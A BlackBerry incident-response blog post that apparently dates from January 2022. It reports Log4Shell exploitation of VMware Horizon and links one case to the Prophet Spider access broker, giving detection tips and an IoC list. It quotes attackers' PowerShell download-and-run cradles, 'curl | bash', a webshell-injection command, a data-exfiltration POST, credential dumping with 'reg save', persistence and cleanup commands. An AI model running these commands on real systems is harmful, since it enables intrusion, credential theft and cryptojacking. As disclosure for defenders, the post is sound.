- Share on Twitter
- Share on Facebook
- Share on Linked In
The BlackBerry Research & Intelligence and Incident Response (IR) teams have found evidence correlating attacks by the Initial Access Broker (IAB) group Prophet Spider with exploitation of the Log4j vulnerability in VMware Horizon. This article highlights the recent indicators of compromise (IoCs) that we've observed.
Defenders concerned that they may have been a victim of these attacks can make use of these IoCs and detection methods to identify evidence of compromise within their environment.
"Log4Shell" is a moniker used to refer to a combination of remote code execution (RCE) vulnerabilities (CVE-2021-44228, CVE-2021-45046, CVE-2021-44832) identified in Apache Log4j, a logging framework based on Java which is incorporated into Apache web servers all over the world. Due to Log4j's popularity in many applications (including VMware), combined with the severity of the exploit, security teams were recently left scrambling in the wake of widespread exploitation of this new attack vector.
The exact number of applications (and the various versions) affected by these vulnerabilities may never be fully known. Although VMware released a patch and mitigation guidance in December 2021 in response to the vulnerability, many implementations remain unpatched, leaving them susceptible to exploitation.
Initial DetectionBlackBerry researchers have observed that the exploit could be reliably detected by monitoring child processes of the ws_TomcatService.exe parent process, as this is the same Tomcat service used by VMware Horizon. In all observed cases, exploitation of the ws_TomcatService.exe process spawned either cmd.exe or powershell.exe as child processes.
Figure 1: Parent and child process relationship
Post Exploitation ActivityUpon exploiting the vulnerability, threat actors most commonly used encoded PowerShell commands to download a second-stage payload to the victimized systems. The specifics of that payload depend on the attacker's motives and goals; for example, cryptomining, or ransomware and extortion.
While BlackBerry primarily observed the threat actors installing cryptocurrency mining software on the affected systems, Cobalt Strike beacons were also discovered in some instances.
Encoding Examples
cmd /C "powershell -NonI -W Hidden -NoP -Exec Bypass -Enc powershell.exe -Enc |
Once decoded, the resulting code used one of two methods to download the second-stage payload. The first and more common method was the use of PowerShell's System.Net.Webclient class, along with the DownloadString, DownloadData, or DownloadFile methods.
Typical Download Cradle
IEX (New-Object Net.WebClient).DownloadString('') |
Alternatively, there were also cases where the threat actor attempted to use the curl.exe binary file to download additional files to the system. The attacker then attempted to execute the downloaded content using the Windows Subsystem for Linux (WSL) bash utility.
Curl Download Attempt
cmd /C "curl | bash" |
BlackBerry threat researchers identified multiple different cryptocurrency miners that were deployed after successful exploitation by threat actors. One example used Powershell to download and execute the "xms.ps1" file containing the cryptominer.
Cryptocurrency Miner Download Example
powershell iex(New-Object Net.WebClient).DownloadString('hxxp://80.71.158[.]96/xms.ps1') |
The script then created a Scheduled Task, which was used to establish persistence, as well as for storing command-and-control (C2) and wallet configurations.
Scheduled Task Creation
"C:Windowssystem32schtasks.exe" /create /F /sc minute /mo 1 /tn BrowserUpdate /tr |
We also discovered instances where a webshell file was injected into absg-worker.js and the VMBlastSG service restarted to allow for connections to the webshell, as described in this warning posted by the National Health Service for the UK. Webshells are difficult to detect backdoors that threat actors use to maintain stealthy persistence in a victim's environment.
To accomplish this injection, threat actors search for the file path to the VMBlastSg service, then change the file name in the path from NSSM.exe to absg-worker.js. Next, the content of the absj-worker.js file is modified to force the creation of a child process when the file is called via a browser. Then the VMBlastSG service is restarted, and the webshell is available to the attacker.
Webshell Creation
powershell -c "$path=gwmi win32_service|?{$_.Name -like """*VMBlastSG*"""}|%{$_.PathName -replace '"""', '' -replace """nssm.exe""","""libabsg-worker.js"""};$expr="""req.connection.end();}if (String(req.url).includes('lxmvvZ3S4o250Tw22Z9vTao0cJFmkplDoi828cVwQtZVj3eUbb')) {try |
BlackBerry researchers observed several instances of cleanup actions taken by threat actors following the miner installation, to help cover their tracks. (After all, everyone appreciates a tidy and thoughtful threat actor!)
Cleanup Examples
"C:Windowssystem32cmd.exe" /c del /f /q C:ProgramDataOracleJavajava.exe" |
"C:WindowsSystem32WbemWMIC.exe" process where "ExecutablePath like 'c:\windows\temp\%'" delete |
"C:WindowsSystem32WbemWMIC.exe" process where "ExecutablePath like 'C:\Users\\AppData\Local\Temp\%'" delete |
"C:Windowssystem32cmd.exe" /c del /f /q C:ProgramDatanTNLLnvWzlpythonhs.exe |
"C:Windowssystem32cmd.exe" /c del /f /q %tmp%sysupdate.exe |
"C:WindowsSystem32WbemWMIC.exe" process where "ExecutablePath like 'C:\Users\Administrator\AppData\Local\Temp\%'" delete |
"C:Windowssystem32schtasks.exe" /delete /tn * /F |
In additional instances of post-exploitation deployment, the threat actor downloaded and installed a Cobalt Strike beacon to the infected systems.
Cobalt Strike Download Cradle
IEX ((New-Object System.Net.WebClient).DownloadString('hxxp://185.112.83[.]116:8080/drv')) |
We were able to retrieve a copy of the Cobalt Strike configuration, which indicated that successful execution of the Cobalt Strike beacon would spawn either a 32- or 64-bit version of rundll32.exe containing the beacon payload. The following User-Agent string was hard-coded into the beacon configuration.
Cobalt Strike Beacon User-Agent String
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3; .NET CLR 2.0.50727) |
Prophet Spider Commonalities
In addition to the mass deployment of cryptocurrency mining software and Cobalt Strike beacons, BlackBerry researchers also discovered an instance of exploitation containing tactics, techniques, and procedures (TTPs) relating to the Prophet Spider IAB. This threat group is known to compromise networks and later sell access to ransomware operators. We discussed a similar group called Zebra2104 in our recent report, "Hunter Becomes Hunted: Zebra2104 Hides a Herd of Malware."
One of the indicators that helped us attribute the event to this threat group was their use of the C:WindowsTemp7fde folder path to store malicious files. The threat actor also downloaded a copy of the wget.bin executable, which has historically been used by the group to get additional files onto infected hosts. The IP used in the download cradle has also been previously attributed to the Prophet Spider group.
wget.bin Download
powershell -Command (New-Object |
After downloading the wget.bin executable, the file was then used to download two additional executables named ve.bin and winntaa.exe.
Additional Payloads
wget[.]bin -t 1 hxxp://149.28.200[.]140:443/ve.bin wget[.]bin -t 1 hxxp://149.28.200[.]140:443/winntaa.exe -O c:windowstempwinntaa.exe |
Next, the attacker began their attempts to enumerate basic information about the network and domain.
Enumeration
systeminfo tasklist ipconfig /all quser net user net group "Domain Admins" /domain net user Administrator nltest /domain_trusts |
Lastly, the threat actor attempted to harvest credentials from the registry.
Credential Harvesting
reg save hklmsam c:windowstemp7fdesam reg save hklmsystem c:windowstemp7fdesystem reg save hklmsecurity c:windowstemp7fdesecurity |
Conclusion
When an initial access broker group takes interest in a vulnerability whose scope may never be known, this gives us a good indication that they see significant value in its exploitation. It's likely that we will continue to see criminal groups exploring the opportunities of the Log4Shell vulnerability in the near future, as IT teams and users continue to scramble to address these vulnerabilities.
As this situation unfolds and we discover new information, BlackBerry threat researchers will continue to provide intelligence and guidance to help defenders protect against threats that take advantage of the situation.
Indicators of Compromise (IoCs)IOC | Type |
c:windowssystem32configsystemprofilemimunssm.exe | File Path |
c:windowssystem32configsystemprofilemimu2nssm.exe | File Path |
C:Windowssystem32configsystemprofilemimuxmrig.exe | File Path |
c:windowstempwinntaa.exe | File Path |
C:Windowstempwget.bin | File Path |
C:Windowssystem32configsystemprofileAppDataRoamingnetwork02.exe | File Path |
C:WindowsTEMPnetwork02.exe | File Path |
hxxp://149.28.200[.]140:443/wget.bin | URL |
hxxp://lurchmath[.]org/wordpress-temp/wp-content/plugins/xmrig.zip | URL |
hxxp://72.46.52[.]135/mad_micky.bat | URL |
hxxp://api.rogerscorp[.]org:80 | URL |
hxxp://80.71.158[.]96/xms.ps1 | URL |
hxxp://149.28.200[.]140:443/winntaa.exe | URL |
hxxp://185.112.83[.]116:8080/drv | URL |
hxxp://137.184.17[.]252:443/dd.ps1 | URL |
hxxp://101.79.1[.]118/2.ps1 | URL |
hxxp://72.46.52[.]135/kill.bat | URL |
kill.bat | File |
xms.ps1 | File |
mad_micky.bat | File |
xmrig.zip | File |
wget.bin | File |
dd.ps1 | File |
2.ps1 | File |
absg-worker.js | File |
138.68.246[.]18 | IP |
140.246.171[.]141 | IP |
149.28.200[.]140:443 | IP/Port |
150.158.189[.]96 | IP |
159.65.48[.]154 | IP |
167.114.114[.]169:8080 | IP/Port |
167.71.13[.]196 | IP |
170.210.45[.]163 | IP |
175.6.210[.]66 | IP |
185.112.83[.]116:8080 | IP/Port |
185.220.100[.]240 | IP |
185.220.100[.]241 | IP |
185.220.100[.]244 | IP |
185.220.100[.]251 | IP |
185.220.100[.]252 | IP |
185.220.101[.]152 | IP |
185.220.101[.]158 | IP |
185.220.101[.]171 | IP |
185.220.101[.]184 | IP |
185.220.101[.]188 | IP |
185.220.101[.]190 | IP |
185.220.101[.]36 | IP |
185.220.101[.]53 | IP |
185.220.102[.]248 | IP |
185.56.80[.]65 | IP |
192.160.102[.]170 | IP |
194.48.199[.]78 | IP |
198.23.214[.]117:8080 | IP/Port |
198.98.56[.]151 | IP |
216.144.180[.]171 | IP |
23.129.64[.]218 | IP |
23.236.146[.]162 | IP |
45.146.165[.]168 | IP |
45.154.255[.]147 | IP |
45.61.146[.]242 | IP |
5.157.38[.]50 | IP |
51.222.121[.]180 | IP |
51.79.175[.]139:8080 | IP/Port |
62.102.148[.]68 | IP |
72.46.52[.]135:80 | IP/Port |
79.172.212[.]132 | IP |
80.71.158[.]96:80 | IP/Port |
b.oracleservice[.]top | Domain |
api.rogerscorp[.]org | Domain |
Decoded PowerShell Events
powershell -c "$path=gwmi win32_service|?{$_.Name -like """*VMBlastSG*"""}|%{$_.PathName -replace |
cmd /c c:windowstempwinntaa.exe |
powershell -Command (New-Object |
cmd /c c:windowstempwget.bin -t 1 hxxp://149.28.200[.]140:443/winntaa.exe -O c:windowstempwinntaa.exe |
powershell -c curl -uri hxxp://api.rogerscorp[.]org:80 -met POST -Body ([System.Convert]::ToBase64String(([System.Text.Encoding]::ASCII.GetBytes((echo 216.144.180[.]171))))) |
iex ((New-Object System.Net.WebClient).DownloadString('hxxp://185.112.83[.]116:8080/drv')) |
$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += |
cmd /C "curl 72.46.52[.]135/dl.sh | bash" |
powershell iex(New-Object Net.WebClient).DownloadString('hxxp://80.71.158[.]96/xms.ps1') |
powershell -exec bypass -c IEX(New-Object Net.WebClient).DownloadString('hxxp://137.184.17[.]252:443/dd.ps1') |
IEX (New-Object Net.WebClient).DownloadString('hxxp://101.79.1[.]118/2.ps1') |
$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += |
powershell iex(New-Object Net.WebClient).DownloadString('hxxp://80.71.158[.]96/xms.ps1') |
Senior Professional Services Incident Response Consultant at BlackBerry.
Codi Starks has more than twelve years of IT, cybersecurity, and incident response experience. During his time in the field he has supported and led difficult incident response engagements for Fortune 500 companies spanning multiple continents.
He currently holds several certifications and achievements, including an M.S. in Information Security and Assurance, as well as the OSCP and SANS GCFE certifications. He has won multiple cybersecurity competitions, including OpenSOC, SANS DFIR Netwars, and SOCX.
Principal Threat Researcher at BlackBerry.
A seasoned security professional, Ryan Gibson has been in the security industry for over a decade. He has in-depth knowledge of Incident Response, Disk and Memory Forensics, Malware Analysis, Threat Intelligence/Threat Hunting, Splunk, and many other security tools. Prior to BlackBerry, Ryan worked as a Senior Information Security Engineer at Qualcomm.
Principal Incident Response & Forensics Consultant at BlackBerry.
As a Principal Incident Response & Forensics Consultant, Will Ikard is responsible for overseeing BlackBerry's incident response engagements throughout the United States by providing consulting services to clients, including digital forensics, incident containment, malware reverse engineering, compromise assessments, and other security services across the spectrum of incidents types ranging from malware to advanced adversaries. Will also contributes to the development of BlackBerry's Incident Response methodology and tools.
- Share on Twitter
- Share on Facebook
- Share on Linked In
Attachments
- Original Link
- Original Document
- Permalink
Disclaimer
BlackBerry Ltd. published this content on 26 January 2022 and is solely responsible for the information contained therein. Distributed by Public, unedited and unaltered, on 26 January 2022 13:15:01 UTC.